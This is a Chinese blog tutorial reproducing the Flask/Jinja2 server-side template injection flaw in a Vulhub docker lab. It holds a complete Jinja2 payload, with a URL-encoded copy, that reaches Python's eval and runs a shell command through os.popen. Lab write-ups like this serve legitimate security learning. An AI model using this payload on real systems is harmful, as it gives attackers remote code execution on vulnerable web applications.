Flask(Jinja2)服务端模板注入漏洞——vulhub/flack/ssti

最新推荐文章于 2024-07-24 08:50:56 发布
最新推荐文章于 2024-07-24 08:50:56 发布
阅读量1.5k 收藏 8
点赞数 2
分类专栏: Kali 3.0——使用Docker搭建Vulhub漏洞靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45625605/article/details/102837747
版权

一、服务端模板注入漏洞

       简述:

       服务器模板注入 (SSTI ) 是一种利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI 攻击可以用来找出 Web 应用程序的内容结构。

二、利用搭的vulhub靶机漏洞复现

     1、 service docker start   //进入虚拟机后开启docker服务

            docker version   查看docker版本信息确认是否开启

     2、cd /vulhub/flack/ssti   //进入到ssti的目录下

        

     3、cat README.md    //查看README.md 目录,这里是该漏洞复现的具体流程。

        

    4、docker-compose up -d   &&  docker-compose  build    // 加载环境并运行

    5、然后在浏览器上访问http://your-ip:8000,

    

     6、访问http://your-ip/?name={{233*233}},得到54289,说明SSTI漏洞存在。

   

     7、  获取eval函数并执行任意python代码的POC: //获取os

   ```
   {% for c in [].__class__.__base__.__subclasses__() %}
     {% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
```

    8、最后放到浏览器里注意要url编码,得到执行结果。

http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D

  

三、漏洞复现成功后,可删除掉镜像

  1、docker-compose  down   //docker-compose容器停止运行

  2、docker ps  //查看容器进程

       docker images  //查看下载保存的镜像

     

 3、docker rmi 1a2dea4ab6aa   //需要删除ssti_flask  下载源地址

      

 

 

Stephen Wolf
关注
专栏目录
flask框架jinja2模板模板继承实例分析
09-18
首先,我们来探讨一下如何在Flask中使用Jinja2模板。在Flask应用中,Jinja2模板通常保存在名为templates的文件夹中。Flask在运行时会自动查找这个文件夹,并渲染其中的模板。例如,在上述内容中,我们看到了一个名为...
flask 框架web开发视频笔记
麟三岁的博客
05-21 400
requirements文件 python 项目种必须包含一个requirements文件,用于记录所有依赖包以及其精确得版本号,以遍在新环境种进行部署操作。 在虚拟环境种使用以下命令将当前虚拟环境中的依赖版本号生产至文件中: pip freeze > requirements.txt 需求文件的内容示例如下: 复制老项目生成的文件,在新的项目中黏贴后,在虚拟环境中执行执行下列命令: pip install -r requirements.txt 安装包就依次下载了 第一个flask 程序 fr
FlaskJinja2服务端模板注入漏洞
浅笑996的博客
12-11 1362
原理 参考文章: https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf http://rickgray.me/use-python-features-to-execute-arbitrary-codes-i...
Python Flask编写的可以RCE远程命令执行的网页
最新发布
LaiSC'S Blog
07-24 137
【代码】Python Flask编写的可以RCE远程命令执行的网页。
Vulnhub flaskSSTI漏洞复现
qq_69209270的博客
09-23 379
Vulnhub flaskSSTI漏洞复现
Vulhub Flask SSTI漏洞复现
CyhDl666的博客
03-26 1083
文章目录环境搭建漏洞复现python3python2CTFSHOWWEB361WEB362WEB363 环境搭建 首先利用docker搭建好环境 docker-compose up -d docker ps查看搭建的端口:8000 漏洞复现 开始复现 flask-ssti漏洞以前有总结过 整理的不够好 今天重新整理一下 目源码 from flask import Flask, request from jinja2 import Template app = Flask(__name__)
vulhub漏洞复现十五_flask
weixin_44193247的博客
01-26 1335
vulhub漏洞复现练习篇
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过》 SSTI,即Server-Side Template Injection,是针对服务器端模板引擎的一种安全漏洞,允许攻击者通过注入恶意代码来控制模板渲染过程,从而获取敏感信息或...
Flask模板引擎之Jinja2语法介绍
01-20
Jinja是组成Flask模板引擎。可能你还不太了解它是干嘛的,但你对下面这些百分号和大括号肯定不陌生: {% block body %} {% for user in users %} <li><a>{{ user.username }}</a></li> {% endfor %} </ul> ...
SSTI模板注入漏洞(vulhub 复现)
weixin_74790320的博客
02-18 1465
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,,模板引擎会提供一套生成html代码的程序,,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。模板引擎也会提供沙,但是可以用简而言之我的理解是模板引擎的关键就是只需要用户提供数据给模板便可以生成前端html页面,模板引擎有一定的防范机制,但是可以利用一定技术去绕过破解。
vulhub学习(3) flask-ssti 漏洞复现
yukinorong的博客
06-24 2253
环境准备 漏洞环境选择vulhub , 如上述配置 进入flask/ssti 打开docker环境 这里可以看见环境启动成功 由于我的vulhub配置在虚拟机上,不能直接用127访问。 打开命令行 ifconfig,找到ip 192.x docker 启动环境会另外配置端口,利用docker ps查询。发现是8000 漏洞原理 利用浏览器访问可以看见页面 查看源码 可以看到核心语句为 t = Template("hello " + name) 此处,函数利用get获取参数进入template
解读2017-08-10发布的几个安全漏洞
weixin_34268579的博客
08-20 407
标签 PostgreSQL , 安全漏洞 , CVE-2017-7546 , CVE-2017-7547 , CVE-2017-7548 背景 PostgreSQL 社区于08-10发布了新版本,修复了三个安全漏洞。 https://www.postgresql.org/about/news/1772/ CVE-2017-7546: Empty...
利用Vulnhub复现漏洞 - FlaskJinja2服务端模板注入漏洞
JiangBuLiu的博客
07-08 1138
FlaskJinja2服务端模板注入漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/flask/ssti/ 漏洞原理 https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-In...
渗透技术学习之二--docker搭建vulhub靶场进行nginx服务漏洞分析
阿党的专栏
03-09 1390
docker搭建vulhub靶场进行nginx服务漏洞分析
SSTI完全学习
热门推荐
Sea_Sand息禅
07-19 2万+
一、什么是SSTI SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。 常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。 sql注入是从用户获...
Flask服务端模板(Jinja2) SSTI 注入漏洞
weixin_51387754的博客
11-22 1468
漏洞简介 flask/ssti漏洞,即: FlaskJinja2服务端模板注入漏洞(SSTI)。Flask 是一个使用 Python 编写的轻量级 Web 应用框架,Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 web 应用程序可以是一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。Jinja 2是一种面向Python的现代和设计友好的模板语言。 影响版本 使用Flask框架开发并且使用Jinja2模板引擎,最重要的是模板内容可控。满足该条件的Fla
使用FlaskJinja2构建Web应用:模板与表单实战
"本文主要探讨如何在Flask框架中利用Jinja2模板引擎和WTForms表单插件来构建一个更高效、可维护的Web应用。通过实例展示了一个简单的登录页面的实现,以及如何将HTML代码与逻辑分离,提高代码的可读性和可扩展性。" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值